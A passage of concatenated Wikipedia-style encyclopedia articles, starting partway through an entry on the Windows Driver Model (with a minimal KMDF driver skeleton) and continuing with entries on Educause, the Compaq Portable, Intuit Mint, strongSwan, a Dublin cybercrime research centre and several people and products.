A device driver that was not designed for a specific hardware component may nevertheless allow that device to function, because the basic functionality of a hardware device class is similar. The functionality of the video card class, for example, allows the Microsoft Basic Display Adapter driver to work with a wide variety of video cards. However, installing the wrong driver for a device means that the full functionality of the device cannot be used, and may result in poor performance and destabilization of the Windows operating system. Hardware device vendors may release updated device drivers for particular Windows operating systems to improve performance, add functionality or fix bugs. If a device is not working as expected, the latest device drivers should be downloaded from the vendor's website and installed.
Device drivers are designed for particular Windows operating system versions, and device drivers for a previous version of Windows may not work correctly or at all with other versions. Because many device drivers run in kernel mode installing drivers for a previous operating system version may destabilise the Windows operating system. Migrating a computer to a higher version of a Windows operating system therefore requires that new device drivers are installed for all hardware components. Finding up to date device drivers and installing them for Windows 10 has introduced complications into the migration process.
Common device driver compatibility issues include the following. A 32-bit device driver is required for a 32-bit Windows operating system, and a 64-bit device driver is required for a 64-bit Windows operating system. 64-bit device drivers must be signed by Microsoft, because they run in kernel mode and have unrestricted access to the computer hardware. For operating systems prior to Windows 10, Microsoft allowed vendors to sign their 64-bit drivers themselves, assuming the vendors had undertaken compatibility tests; Windows 10 64-bit drivers now need to be signed by Microsoft, so device vendors have to submit their drivers to Microsoft for testing and approval. The driver installation package includes all files in the .inf directory, and all files in the package need to be installed, otherwise the installation of the device driver may fail; for operating system versions before Windows 10, not all files necessary for the driver installation were always included in the package, as this requirement was not consistently enforced. Some device driver installers have a graphical user interface, often requiring user configuration input, but the absence of a user interface does not mean that the installation of the device driver was unsuccessful; in addition, Windows 10 device drivers are not allowed to include a user interface. The Network Driver Interface Specification (NDIS) 10.x is used for network devices by the Windows 10 operating system; network device drivers for Windows XP use NDIS 5.x and may work with subsequent Windows operating systems, but for performance reasons network device drivers should implement NDIS 6.0 or higher. Similarly, WDDM, which replaced XPDM, is the display driver model for Windows Vista and later.
Device Manager
The Device Manager is a Control Panel applet in Microsoft Windows operating systems. It allows users to view and control the hardware attached to the computer and to view and modify hardware device properties, and it is the primary tool for managing device drivers.
Criticism
The Windows Driver Model, while a significant improvement over the VxD and Windows NT Driver Model used before it, has been criticised by driver software developers, most significantly for the following:
Interactions with power management events and plug and play are difficult. This can lead to situations where Windows machines cannot enter or exit sleep modes correctly due to bugs in driver code.
I/O cancellation is difficult to get right.
Complex boilerplate support code is required for every driver.
There is no support for writing pure user-mode drivers.
There were also a number of concerns about the quality of documentation and samples that Microsoft provided.
Because of these issues, Microsoft has released a new set of frameworks on top of WDM, called the Windows Driver Frameworks (WDF; formerly Windows Driver Foundation), which includes Kernel-Mode Driver Framework (KMDF) and User-Mode Driver Framework (UMDF). Windows Vista supports both pure WDM and the newer WDF. KMDF is also available for download for Windows XP and even Windows 2000, while UMDF is available for Windows XP and above.
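The reduction in boilerplate can be seen in a minimal KMDF skeleton, sketched here under the assumption of the published KMDF interfaces (wdf.h); the callback name MyEvtDeviceAdd is illustrative. Device-object creation, attachment to the underlying WDM stack and default handling of Plug and Play, power and unclaimed I/O requests are performed by the framework rather than by driver code.

#include <ntddk.h>
#include <wdf.h>

EVT_WDF_DRIVER_DEVICE_ADD MyEvtDeviceAdd;

/* The framework calls this for each device; it creates the framework device
 * object and attaches it to the underlying WDM stack on the driver's behalf. */
NTSTATUS MyEvtDeviceAdd(WDFDRIVER Driver, PWDFDEVICE_INIT DeviceInit)
{
    WDFDEVICE device;
    UNREFERENCED_PARAMETER(Driver);
    return WdfDeviceCreate(&DeviceInit, WDF_NO_OBJECT_ATTRIBUTES, &device);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    WDF_DRIVER_CONFIG config;

    /* Register the device-add callback; the framework supplies default
     * behaviour for everything the driver does not explicitly claim. */
    WDF_DRIVER_CONFIG_INIT(&config, MyEvtDeviceAdd);
    return WdfDriverCreate(DriverObject, RegistryPath,
                           WDF_NO_OBJECT_ATTRIBUTES, &config, WDF_NO_HANDLE);
}

An equivalent pure WDM driver would have to create and attach its device objects and provide dispatch routines explicitly, as in the sketches above.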
See also
Windows Driver Frameworks (WDF)
Kernel-Mode Driver Framework (KMDF)
User-Mode Driver Framework (UMDF)
Windows Display Driver Model (WDDM)
References
Finnel, Lynn (2000). MCSE Exam 70-215, Microsoft Windows 2000 Server. Microsoft Press.
Oney, Walter (2003). Programming the Windows Driver Model. Microsoft Press.
External links
WDM Input Output Concepts - This article gives a high level overview of the I/O concepts as defined in the Windows Driver Model.
Windows driver API basics - This article informs you about the basics behind sound card drivers such as WDM, ASIO, MME, DirectX, etc.
Channel 9 Video - Interview with the Device Management and Installation team at Microsoft, primarily covering Plug-and-play.
- Free lecture notes book fragment detailing basic creation of Windows Drivers, Kernel Mode programming, and Memory management
Device drivers
Driver Model
Windows 98
|
3417956
|
https://en.wikipedia.org/wiki/Educause
|
Educause
|
Educause is a nonprofit association in the United States whose mission is "to advance higher education through the use of information technology". Membership is open to institutions of higher education, corporations serving the higher education information technology market, and other related associations and organizations.
Overview
The association provides networking and other platforms for higher education IT professionals to generate and find content on best practices and to engage their peers. Examples include professional development opportunities, print and electronic publications (including e-books and the magazine Educause Review), strategic policy advocacy, teaching and learning initiatives, applied research, special interest discussion groups, awards for leadership, and a resource center for IT professionals in higher education, such as Campus Privacy Officers.
Major initiatives of Educause include the Core Data Service, the Educause Center for Analysis and Research (ECAR), the Educause Learning Initiative (ELI), the Educause Policy Program, and the Educause/Internet2 Computer and Network Security Task Force. In addition, Educause manages the .edu Internet domain under a contract with the United States Department of Commerce. The technical aspects of the registry are managed by VeriSign.
The current membership of Educause comprises more than 2,300 colleges, universities, and educational organizations, including 300 corporations, with 16,500 active members.
Edupage
Edupage was a publication of Educause. It was a free, three-times-a-week, electronically distributed summary of technology news drawn from the mainstream media, first released to a circulation of fewer than 100 readers in 1992. It was originally written by John Gehl and Suzanne Douglas, who left in April 1999 to devote their full attention to their own company, which publishes a daily newsletter similar to Edupage.
Edupage has been on publishing hiatus since December 2006, as Educause looks at different ways to deliver resources and content to its audience.
History
Educause was formed from a merger of CAUSE and Educom in 1998. The two organizations were the two major information technology associations within higher education. CAUSE grew out of a users group known as the College and University Systems Exchange.
See also
Campus Consortium
Internet2
Worldware, term coined by the Valuable Viable Software (VVS) project of Educom
References
External links
EDUCAUSE Review Magazine
About Membership
Educause Center for Analysis and Research (ECAR)
Educause Learning Initiative (ELI)
Edupage Archives from 1993 - 1999
Official Edupage Archives from January 1999 - 2006
Educational charities based in the United States
Higher education in the United States
|
58741776
|
https://en.wikipedia.org/wiki/Phedra%20Clouner
|
Phedra Clouner
|
Phedra Clouner is a cybersecurity professional active in Belgium. On 10 August 2015, she was appointed to the role of deputy manager to the CCB (Center for Cybersecurity in Belgium, the central authority in charge of cybersecurity in Belgium).
Studies
Phedra Clouner graduated from the Université Libre de Bruxelles in 2001 with a degree in history.
Career
Clouner is the founder and administrator of FedISA Belgium, the Belgian branch of the federation for Information Lifecycle Management, Storage and Archiving.
On 10 August 2015, she was appointed to the role of deputy manager to the CCB (Center for Cybersecurity in Belgium, the central authority in charge of cybersecurity in Belgium). She carries out activities relating to the detection, observation and analysis of online security problems.
References
Year of birth missing (living people)
Living people
People in information technology
Université libre de Bruxelles alumni
|
45639654
|
https://en.wikipedia.org/wiki/Zeroth%20%28software%29
|
Zeroth (software)
|
Zeroth is a platform for brain-inspired computing from Qualcomm. It is based around a neural processing unit (NPU), an AI accelerator chip, and a software API to interact with the platform. It makes a form of machine learning known as deep learning available to mobile devices. It is used for image and sound processing, including speech recognition. The software operates locally rather than as a cloud application.
Mobile chip maker Qualcomm announced in March 2015 that it would bundle the software with its next major mobile device chip, the Snapdragon 820 processor.
Applications
Qualcomm demonstrated that the system could recognize human faces and gestures that it had seen before and detect and then search for different types of photo scenes.
Another potential application is to extend battery life by analyzing phone usage and powering down all or part of its capabilities without affecting the user experience.
See also
Neuromorphic computing
TrueNorth
SpiNNaker
Vision processing unit, a class of processors aimed at machine vision (including convolutional neural networks, hence overlapping with 'neural processing units')
References
Qualcomm software
Mobile software
Data mining and machine learning software
Image processing software
Speech recognition software
AI accelerators
|
1374269
|
https://en.wikipedia.org/wiki/Compaq%20Portable
|
Compaq Portable
|
The Compaq Portable is an early portable computer which was one of the first IBM PC compatible systems. It was Compaq Computer Corporation's first product, to be followed by others in the Compaq Portable series and later Compaq Deskpro series. It was not simply an 8088-CPU computer that ran a Microsoft DOS as a PC "work-alike", but contained a reverse-engineered BIOS, and a version of MS-DOS that was so similar to IBM's PC DOS that it ran nearly all its application software. The computer was also an early variation on the idea of an "all-in-one".
It became available two years after the similar, but CP/M-based, Osborne 1 and Kaypro II. Columbia Data Products' MPC 1600 "Multi Personal Computer" had come out in June 1982. Other "work-alikes" included the MS-DOS and 8088-based, but not entirely IBM PC software compatible, Dynalogic Hyperion, Eagle Computer's Eagle 1600 series (including the Eagle Spirit portable), and the Corona personal computer. The latter two companies were threatened by IBM for BIOS copyright infringement and settled out of court, agreeing to re-implement their BIOS. There was also the Seequa Chameleon, which had both 8088 and Z80 CPUs to alternately run MS-DOS or CP/M. Unlike Compaq, many of these companies had previously released computers based on Zilog's Z80 and Digital Research's CP/M operating system. Like Compaq, they recognized the replicability of the IBM PC's off-the-shelf parts, and saw that Microsoft retained the right to license MS-DOS to other companies. Only Compaq was able to fully capitalize on this, by aiming for complete IBM PC and PC DOS software compatibility while reverse-engineering the BIOS to head off copyright claims.
Another contemporary system was the Commodore SX-64, also known as the Executive 64 (or VIP-64 in Europe), a briefcase/suitcase-size "luggable" version of the popular Commodore 64 home computer built around an 8-bit MOS 6510 (6502-based) microprocessor, and the first full-color portable computer. Like the Z80 and "work-alike" portables, its sales fell into insignificance in the face of the Compaq Portable series.
Production and sales
The Compaq Portable was announced in November 1982 and first shipped in March 1983, priced at US$2,995 with a single half-height 5¼-inch 360 kB diskette drive, or US$3,590 for dual full-height diskette drives. The Compaq Portable folded up into a luggable case the size of a portable sewing machine.
IBM responded to the Compaq Portable with the IBM Portable, developed because its sales force needed a comparable computer to sell against Compaq.
Compaq sold 53,000 units in the first year, with a total of US$111 million in revenue, an American business record. In the second year, revenue hit US$329 million, setting an industry record. Third-year revenue was US$503.9 million, another US business record.
Design
The Compaq Portable has basically the same hardware as an IBM PC, transplanted into a luggable case (specifically designed to fit as carry-on luggage on an airplane), with Compaq's BIOS instead of IBM's. All Portables shipped with 128 KB of RAM and 1-2 double-sided double-density 360 KB disk drives. Like the non-portable IBM PC, the Compaq Portable runs on power from an AC outlet only; it has no battery.
The machine uses a unique hybrid of the IBM MDA and CGA which supports the latter's graphics modes but contains both cards' text fonts in ROM. When using the internal monochrome monitor the 9×14 font is used, and the 8×8 one when an external monitor is used (the user switches between internal and external monitors by pressing ). The user can thus use both IBM video standards, for graphics capabilities and high-resolution text. The same graphics hardware is also used in the original Compaq Deskpro desktop computer, paired with a larger external monitor.
Compaq used a "foam and foil" keyboard from Keytronics, with contact mylar pads that were also featured in the Tandy TRS-80, Apple Lisa 1 and 2, Compaq Deskpro 286 AT, some mainframe terminals, the Sun Type 4, and some Wang keyboards. The foam pads that the keys use to make contact with the circuit board disintegrate over time, through both normal use and natural decay. The CRT display also suffered from a low refresh rate and heavy ghosting.
Software
Compaq's efforts were possible because IBM had used mostly off-the-shelf parts for the PC and published full technical documentation for it, and because Microsoft had kept the right to license MS-DOS to other computer manufacturers. The only difficulty was the BIOS, because it contained IBM's copyrighted code. Compaq solved this problem by producing a clean room workalike that performed all documented functions of the IBM PC BIOS, but was completely written from scratch.
Although numerous other companies soon also began selling PC compatibles, few matched Compaq's achievement of essentially-complete software compatibility with the IBM PC (typically reaching "95% compatibility" at best) until Phoenix Technologies and others began selling similarly reverse-engineered BIOSs on the open market.
The first Portables used Compaq DOS 1.10, essentially identical to PC DOS 1.10 except for having a standalone BASIC that did not require the IBM PC's ROM Cassette BASIC, but this was superseded in a few months by DOS 2.00 which added hard disk support and other advanced features.
Aside from using DOS 1.x, the initial Portables are similar to the 16 KB – 64 KB models of the IBM PC in that the BIOS was limited to 544 KB of RAM and did not support expansion ROMs, thus making them unable to use EGA/VGA cards, hard disks, or similar hardware. After DOS 2.x and the IBM XT came out, Compaq upgraded the BIOS. Although the Portable was not offered with a factory hard disk, users commonly installed them. Starting in 1984, Compaq began offering a hard disk-equipped version, the Portable Plus, which also featured a single half-height floppy drive. The hard disk offered would be 10 to 21 megabytes, although bad sectors often reduced the space available for use.
In 1985, Compaq introduced the Portable 286, but it was replaced by the more compact Portable II in a redesigned case within a few months. The Portable 286 featured a full height hard disk, and the options of one half-height floppy drive, two half-height floppy drives, or a half-height floppy drive and a tape backup drive.
Reception
BYTE wrote, after testing a prototype, that the Compaq Portable "looks like a sure winner" because of its portability, cost, and high degree of compatibility with the IBM PC. Its reviewer tested IBM PC DOS, CP/M-86, WordStar, Supercalc, and several other software packages, and found that all worked except one game. PC Magazine also rated the Compaq Portable very highly for compatibility, reporting that all tested applications ran. It praised the "rugged" hardware design and sharp display, and concluded that it was "certainly worth consideration by anyone seeking to run IBM PC software without an IBM PC".
Successors
Upgrades of Compaq Portable
Compaq Portable Plus
Released in 1983, the Compaq Portable Plus was an upgraded version in which a hard drive replaced one floppy disk drive, and the logos and badges had gold backgrounds instead of silver. Independent computer stores had previously been doing this upon request of users, and Compaq saw it as a lost revenue opportunity.
Compaq Portable 286
The Compaq Portable 286, Compaq's version of the PC AT, was offered in the original Compaq Portable chassis; it was equipped with a 6/8 MHz 286 and a high-speed 20 MB hard drive.
Compaq Portable series
The Compaq Portable was the first of a series of Compaq Portable machines. The Compaq Portable II was a smaller and lighter version of the Compaq Portable 286; it was less expensive but had limited upgradability and a slower hard drive. The Compaq Portable III, Compaq Portable 386, Compaq Portable 486 and Compaq Portable 486c came later in the series.
References
External links
Old Computers - Compaq Portable
CED in the History of Media Technology - Compaq Portable
Obsolete Computer Museum - Compaq Portable description
Computer-related introductions in 1983
|
13783191
|
https://en.wikipedia.org/wiki/Intuit%20Mint
|
Intuit Mint
|
Mint, also known as Intuit Mint (styled in its logo as intuit mint with dotted 't' characters in "intuit" and undotted 'i' characters) and formerly known as Mint.com, is a personal financial management website and mobile app for the US and Canada produced by Intuit, Inc. (which also produces TurboTax, QuickBooks, and Credit Karma).
Mint.com was originally created by Aaron Patzer and provided account aggregation through a deal with Yodlee, but switched to using Intuit's own system for connecting to accounts after it was purchased by Intuit in 2009. It was later renamed from "Mint.com" to just "Mint". Mint's primary service allows users to track bank, credit card, investment, and loan balances and transactions through a single user interface, as well as create budgets and set financial goals.
As of 2010, Mint.com claimed to connect with more than 16,000 US and Canadian financial institutions and to support more than 17 million individual financial accounts. Mint.com later claimed to have more than 10 million users, and in 2016 it claimed to have over 20 million users.
Mint Bills, previously known as Check and Pageonce, was a financial account management and bill payment service bought by Intuit in 2014 and integrated into Mint.com in March 2017. The Mint.com bill payment service was then discontinued on June 30, 2018.
Investment and finances
Mint raised over $31M in venture capital funding from DAG Ventures, Shasta Ventures, and First Round Capital, as well as from angel investors including Ram Shriram, an early investor in Google. The latest round of $14M was closed on August 4, 2009, and reported by CEO Aaron Patzer as preemptive. TechCrunch later pegged the valuation of Mint at $140M.
In February 2008, revenue was generated through lead generation: referral fees earned by recommending highly personalized, targeted financial products to its users.
Sale
On September 13, 2009, TechCrunch reported Intuit would acquire Mint for $170 million. An official announcement was made the following day.
On November 2, 2009, Intuit announced that its acquisition of Mint.com was complete. The former CEO of Mint.com, Aaron Patzer, was named vice president and general manager of Intuit's personal finance group, responsible for Mint.com and all Quicken online, desktop, and mobile offerings. Patzer further stated that features of the online product Mint.com would be incorporated into Intuit's Quicken desktop product, and vice versa, as two collaborative aspects of the Intuit personal finance team. Patzer left Intuit in December 2012.
Controversial practices
Security
Mint asks users to provide both the user names and the passwords to their bank accounts, credit cards, and other financial accounts, which Mint then stores in its databases in a decryptable format. This has raised concerns that if the Mint databases were ever hacked, both user names and passwords would become available to rogue third parties. Some banks support a separate "access code" for read-only access to financial information, which reduces the risk to some degree.
In January 2017, Intuit and JPMorgan Chase settled a longstanding dispute, and agreed to develop software where Chase customers send their data, for financial purposes, to Mint without having Intuit store customers' names and passwords. It was also agreed Intuit would never sell Chase’s customer data.
See also
Personal financial management
Wikinvest
References
Further reading
External links
2006 establishments in California
American companies established in 2006
Financial services companies established in 2006
Account aggregation providers
Accounting software
Intuit software
Companies based in Mountain View, California
Software companies established in 2006
Finance websites
IOS software
Android (operating system) software
WatchOS software
2009 mergers and acquisitions
|
47871352
|
https://en.wikipedia.org/wiki/Centre%20for%20Cybersecurity%20%26%20Cybercrime%20Investigation
|
Centre for Cybersecurity & Cybercrime Investigation
|
The University College Dublin Centre for Cybersecurity & Cybercrime Investigation (UCD CCI) is a centre for research and education in cybersecurity, cybercrime and digital forensic science in Dublin, Ireland.
The UCD Centre for Cybersecurity & Cybercrime Investigation was established in the early 2000s, and has developed collaborative relationships with law enforcement and industry from across the world. The Centre for Cybersecurity & Cybercrime Investigation is widely regarded as Europe's leading centre for research and education in cybersecurity, cybercrime and digital forensics. UCD CCI trains specialist officers from the Irish national police service, the Garda Síochána, Irish military personnel from the Defence Forces, as well as international law enforcement agencies Interpol and Europol, and authorities from over 40 countries. The CCI also runs educational qualifications and training for the industry sector and multinational corporations. The centre's director is Professor Joe Carthy BSc., PhD.
There is a Memorandum of Understanding between the Centre for Cybersecurity & Cybercrime Investigation at UCD and the National Cyber Security Centre (NCSC) at the DCCAE, the Irish government's computer emergency response team. Additionally, UCD CCI has formal relationships with the Garda Síochána, Irish Defence Forces, INTERPOL, Europol, Visa Inc., the Irish Banking Federation, as well as collaborations with the United Nations Office on Drugs and Crime (UNODC), the Organization for Security and Co-operation in Europe (OSCE), European Anti-Fraud Office (OLAF), Microsoft, Citibank and eBay.
See also
National Cyber Security Centre (NCSC)
Garda Bureau of Fraud Investigation (GBFI)
Communications and Information Services Corps (CIS)
References
External links
University College Dublin (UCD) Centre for Cybersecurity & Cybercrime Investigation (CCI)
Computer security organizations
Cyberwarfare
Cryptography organizations
Information technology management
Software engineering organizations
Communications in the Republic of Ireland
Telecommunications in the Republic of Ireland
Fraud in the Republic of Ireland
Cybercrime
Cybercrime in the Republic of Ireland
|
2479857
|
https://en.wikipedia.org/wiki/StrongSwan
|
StrongSwan
|
strongSwan is a multiplatform IPsec implementation. The focus of the project is on strong authentication mechanisms using X.509 public key certificates and optional secure storage of private keys and certificates on smartcards through a standardized PKCS#11 interface and on TPM 2.0.
Overview
The project is maintained by Andreas Steffen who is a professor for Security in Communications at the University of Applied Sciences in Rapperswil, Switzerland.
As a descendant of the FreeS/WAN project, strongSwan continues to be released under the GPL license. It supports certificate revocation lists and the Online Certificate Status Protocol (OCSP). A unique feature is the use of X.509 attribute certificates to implement access control schemes based on group memberships. StrongSwan interoperates with other IPsec implementations, including various Microsoft Windows and macOS VPN clients. The current version of strongSwan fully implements the Internet Key Exchange (IKEv2) protocol defined by RFC 7296.
Features
strongSwan supports IKEv1 and fully implements IKEv2.
IKEv1 and IKEv2 features
strongSwan offers plugins, enhancing its functionality. The user can choose among three crypto libraries (legacy [non-US] FreeS/WAN, OpenSSL, and gcrypt).
Using the openssl plugin, strongSwan supports Elliptic Curve Cryptography (ECDH groups and ECDSA certificates and signatures) both for IKEv2 and IKEv1, so that interoperability with Microsoft's Suite B implementation on Vista, Win 7, Server 2008, etc. is possible.
Automatic assignment of virtual IP addresses to VPN clients from one or several address pools using either the IKEv1 ModeConfig or IKEv2 Configuration payload. The pools are either volatile (i.e. RAM-based) or stored in a SQLite or MySQL database (with configurable lease-times).
The ipsec pool command line utility allows the management of IP address pools and configuration attributes like internal DNS and NBNS servers.
IKEv2 only features
The IKEv2 daemon is inherently multi-threaded (16 threads by default).
The IKEv2 daemon comes with a High-Availability option based on Cluster IP where currently a cluster of two hosts does active load-sharing and each host can take over the ESP and IKEv2 states without rekeying if the other host fails.
The following EAP authentication methods are supported: AKA and SIM including the management of multiple [U]SIM cards, MD5, MSCHAPv2, GTC, TLS, TTLS. EAP-MSCHAPv2 authentication based on user passwords and EAP-TLS with user certificates are interoperable with the Windows 7 Agile VPN Client.
The EAP-RADIUS plugin relays EAP packets to one or multiple AAA servers (e.g. FreeRADIUS or Active Directory).
Support of RFC 5998 EAP-Only Authentication in conjunction with strong mutual authentication methods like e.g. EAP-TLS.
Support of RFC 4739 IKEv2 Multiple Authentication Exchanges.
Support of RFC 5685 IKEv2 Redirection.
Support of the RFC 4555 Mobility and Multihoming Protocol (MOBIKE) which allows dynamic changes of the IP address and/or network interface without IKEv2 rekeying. MOBIKE is also supported by the Windows 7 Agile VPN Client.
The strongSwan IKEv2 NetworkManager applet supports EAP, X.509 certificate and PKCS#11 smartcard based authentication. Assigned DNS servers are automatically installed and removed again in /etc/resolv.conf.
Support of Trusted Network Connect (TNC). A strongSwan VPN client can act as a TNC client and a strongSwan VPN gateway as a Policy Enforcement Point (PEP) and optionally as a co-located TNC server. The following TCG interfaces are supported: IF-IMC 1.2, IF-IMV 1.2, IF-PEP 1.1, IF-TNCCS 1.1, IF-TNCCS 2.0 (RFC 5793 PB-TNC), IF-M 1.0 (RFC 5792 PA-TNC), and IF-MAP 2.0.
The IKEv2 daemon has been fully ported to the Android operating system including integration into the Android VPN applet. It has also been ported to the Maemo, FreeBSD and macOS operating systems.
KVM simulation environment
The focus of the strongSwan project lies on strong authentication by means of X.509 certificates, as well as the optional secure storage of private keys on smart cards using the standardized PKCS#11 interface, certificate revocation lists and the Online Certificate Status Protocol (OCSP).
An important capability is the use of X.509 attribute certificates, which permits complex access control mechanisms on the basis of group memberships.
strongSwan comes with a simulation environment based on KVM. A network of eight virtual hosts allows the user to enact a multitude of site-to-site and roadwarrior VPN scenarios.
See also
Libreswan
Openswan
References
External links
Free security software
Cryptographic software
Key management
IPsec
Virtual private networks
|
49714462
|
https://en.wikipedia.org/wiki/Haroutune%20Armenian
|
Haroutune Armenian
|
Haroutune Armenian (born 18 June 1942) is a Lebanese-born Armenian-American academic and physician, doctor of public health (1974), professor, president of the American University of Armenia (1997–2009) and its president emeritus, and professor in residence at the UCLA Fielding School of Public Health.
Biography
Doctor Armenian is a Professor in Residence at the University of California in Los Angeles, President Emeritus of the American University of Armenia, and Professor Emeritus at Johns Hopkins University.
Education
American University of Beirut, 1961–1964, B.S. School of Arts and Sciences
American University of Beirut, 1964–1968, M.D. School of Medicine
Johns Hopkins University, 1971–1974, M.P.H. (1972)
Johns Hopkins School of Hygiene & Public Health, Dr.P.H. (1974)
Post-graduate training
American University Medical Center, 1967–1968, Rotating Intern
Beirut, Lebanon, 1968–1971, Resident in Internal Medicine
Johns Hopkins University, School of Hygiene & Public Health, Department of Epidemiology, Commonwealth Fund Exchange Program, 1971–1974
Certification
E.C.F.M.G. Certificate 1967
Republic of Lebanon 1968 License to Practice Medicine
American University of Beirut, 1971, Certificate of Specialty Training: Department of Internal Medicine
Ministry of Health, Lebanon, 1984, Registered Medical Specialties: Internal Medicine and Public Health
Professional experience
Advisory Committee for Research, WHO/EMRO, 2015–
Associate Dean, Academic Programs, Fielding School of Public Health, University of California, Los Angeles, 2011–2014
Visiting Professor, Supervisor Research Chair Epidemiology, Public Health and Environment 2009 - 2013, King Saud University, Riyadh
Professor in Residence, Department of Epidemiology 2008 – Present, University of California, Los Angeles
President, American University of Armenia 1997-2010
Director of the Master of Public Health Program 1989 – 1996, Johns Hopkins University, School of Hygiene and Public Health, Department of Epidemiology
Professor Emeritus 2008 – Present
Professor of Epidemiology 1988 – 2007
Acting Chairman Jan-June 1991 Nov 1993-July 1994
Deputy Chairman 1988 – 1993
Visiting Professor of Epidemiology 1986 – 1987
Professor of Epidemiology 1984 – 1988
Coordinator, Interfaculty Research Project for the Study of the Status of Children in Lebanon, American University of Beirut, 1984–1986
Dean, Faculty of Health Sciences, 1983 – 1988 American University of Beirut
Coordinator, A Health Surveillance and Monitoring Program, Ministry of Health, Lebanon, 1983–1984
Acting Dean, Faculty of Health Sciences, A.U.B. 1981 – 1983
Coordinator, In-Service Program Development, Ministry of Public Health, State of Qatar 1981 – 1983
Senior Associate, Department of Epidemiology Johns Hopkins University 1980 – 1986
Associate Professor of Epidemiology Faculty of Health Sciences, A.U.B. 1979 – 1984
Planning Coordinator, Family Practice Residency Programs; Ministry of Health, State of Bahrain and American University of Beirut 1978 – 1979
Coordinator, Office of Professional Standards and Systems Analysis; Ministry of Health State of Bahrain 1976 – 1981
Manager, Health Services Research and Development A.U.B. Services Corporation 1976–1979
Commissioning Officer, Health Centers, Ministry of Health, State of Bahrain 1976–1978
Assistant Professor of Epidemiology, School of Public Health, American University of Beirut 1974 – 1979
Societies and honors
Order of St. Sahak – St. Mesrop Catholicos of All Armenians, Armenia, 2007
Advising, Teaching and Mentoring Award Johns Hopkins Bloomberg School Student Assembly 2005 & 1999
Presidential Medal of the Order of Cedars, Lebanon 2004
Golden Apple Award for Excellence in Teaching Johns Hopkins Bloomberg School of Public Health 2002
Movses Khorenatsi Presidential Medal of Service and Accomplishment, Armenia, 2001
Fellow, Royal College of Physicians, London, 2001
Honorary Diploma of Appreciation, Ministry of Health, Lebanon 1997
Secretary, International Epidemiological Association Executive Council 1996–2002
Ernest Lyman Stebbins Medal, Excellence in Education School of Hygiene and Public Health, Johns Hopkins University 1995
Honorary President, Armenian Public Health Association 1995
Member, Scientific Advisory Board, National Institutes of Health of Armenia 1993
Search Committee, Director, Centers for Disease Control and Prevention, U.S.A. 1993
Certificate of Recognition of Excellence, Armenian Behavioral Science Association, 1992
American Epidemiological Society 1989
Society for Epidemiologic Research 1989
Secretary, International Board of Advisors, Armenian Genealogical Society, 1988
Society of Scholars, Johns Hopkins University 1986
Who's Who in Science 1985
Who's Who in Lebanon 1985
Delta Omega, National Honorary Public Health Society 1985
Central Executive Committee, Hamazkaine Cultural Association, 1981
Member, International Epidemiological Association 1981-
Member, American College of Preventive Medicine 1981
Executive Board Member, Association of Lebanese Armenian Physicians, 1980–1982
Fellow, American College of Epidemiology 1980
Member, American Public Health Association 1980 -
Alpha Omega Alpha, Honor Medical Society 1979
Board Member, Karageuzian Foundation, Beirut 1978 -1987
Lebanese Public Health Association 1975
Lebanese Order of Physicians 1968
Painting
Haroutune Armenian started painting in Beirut in 1976 during the civil war in Lebanon. His works have been exhibited in Beirut, Los Angeles and Yerevan.
Publications
Books
Editor with H. Zurayk and Author of a Chapter: Beirut 1984. A Population & Health Profile. American University Press, 1985.
Editor with J. Bryce and author of three chapters; In Wartime: The State of Children in Lebanon. American University of Beirut, 1986.
Armenian HK, Gordis L, Gregg MB and Levine MM (eds): Epidemiologic Reviews, Volume 11, Johns Hopkins University, 1989.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 12, Johns Hopkins University, Baltimore, 1990.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 13, Johns Hopkins University, Baltimore, 1991.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 14, Johns Hopkins University, Baltimore, 1992.
Armenian HK, Gordis L, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 15, Johns Hopkins University, Baltimore, 1993.
Armenian HK, (ed). Epidemiologic Reviews, Applications of the Case-Control Method, Volume 16(1), Johns Hopkins University, Baltimore, 1994.
Armenian HK, Gordis L, Kelsey J, Levine MM, Thacker SB (eds): Epidemiologic Reviews, Volume 16(2), Johns Hopkins University. Baltimore, 1994.
Armenian HK, Kelsey J, Levine MM, Samet J, Thacker SB (eds): Epidemiologic Reviews, Volume 17(2). Johns Hopkins University, Baltimore, 1995.
Armenian HK, Kelsey J, Levine MM, Samet J, Thacker SB (eds): Epidemiologic Reviews, Volume 18(2), Johns Hopkins University, Baltimore, 1996.
Armenian HK, Kelsey J, Levine MM, Samet J. Thacker SB (eds). Epidemiologic Reviews, Volume 19(2), Johns Hopkins University, Baltimore 1997.
Armenian HK, Shapiro S (eds). Epidemiology and Health Services. Oxford University Press, New York, 1998.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 20 (2), Johns Hopkins University, Baltimore, 1998.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 21(2), Johns Hopkins University, Baltimore, 1999.
Armenian HK, Samet JM (eds). Epidemiologic Reviews, Volume 22(1), Epidemiology in the Year 2000 and Beyond, Johns Hopkins University. Baltimore, 2000.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 22(2), Oxford University Press for the Johns Hopkins University School of Hygiene and Public Health, Baltimore, 2000.
Hsing AW, Nomura AM, Isaacs WB, Armenian HK (eds). Epidemiologic Reviews, Volume 23(1), Prostate Cancer, Oxford University Press for the Johns Hopkins University School of Hygiene and Public Health, Baltimore, 2001.
Armenian HK, Kelsey J, Monto AS, Samet J, Thacker SB (eds). Epidemiologic Reviews, Volume 23(2), Oxford University Press for the Johns Hopkins University School of Hygiene and Public Health, Baltimore, 2002.
Armenian, HK. Colors and Words from Armenia and Beyond (watercolors and prose-poetry) 2002 in Armenian and 2004 in English, Print info, Yerevan.
Armenian, HK. Past Does not Melt Here (watercolors & prose poetry) 2007 in Armenian.
Armenian, HK. Case Control Studies: Design and Applications, Oxford University Press, New York, 2009.
Armenian, HK. Life With Watercolors. Noah's Ark, Beirut, 2014.
Publications-Journals
Armenian HK: Bone and Marrow Needle Biopsy. Leb Med J. 24:245 51;1971.
Baghdassarian SA, Armenian HK, Khachadurian AK: Absence of Ophthalmoscopic Changes in Familial Paroxysmal Polyserositis. Archives Ophthalmology, 88:607 08;1972.
